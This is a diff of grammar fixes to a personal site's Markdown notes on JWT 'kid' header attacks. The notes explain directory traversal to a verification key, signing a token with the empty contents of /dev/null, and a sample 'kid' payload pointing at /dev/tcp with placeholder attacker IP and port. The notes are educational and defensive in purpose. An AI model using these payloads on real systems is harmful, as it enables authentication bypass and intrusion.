ladybuginthemug/ladybuginthemug.github.io/content/writings/JOSE.md

 * If this parameter is also vulnerable to [directory traversal](https://portswigger.net/web-security/file-path-traversal), an attacker could potentially force the server to use an arbitrary file from its filesystem as the verification key.

 	* This is especially dangerous if the server also supports JWTs signed using symmetrical algorithms.
-In this case, an attacker could potentially point the `kid` parameter to a predictable, static file, then sign the JWT using a secret that matches the contents of this file.
+In this case, an attacker could potentially point the `kid` parameter to a predictable, static file, and then sign the JWT using a secret that matches the contents of this file.

 ```
 "kid":"/dev/tcp/_yourIP_/_yourPort_
 ```

 * You could theoretically do this with any file, but one of the simplest methods is to use `/dev/null`, which is present on most Linux systems.
 As this is an empty file, reading it returns an empty string.
-Therefore, signing the token with a empty string will result in a valid signature
+Therefore, signing the token with an empty string will result in a valid signature

  | Mitigation                                                                               |
  | ---------------------------------------------------------------------------------------- |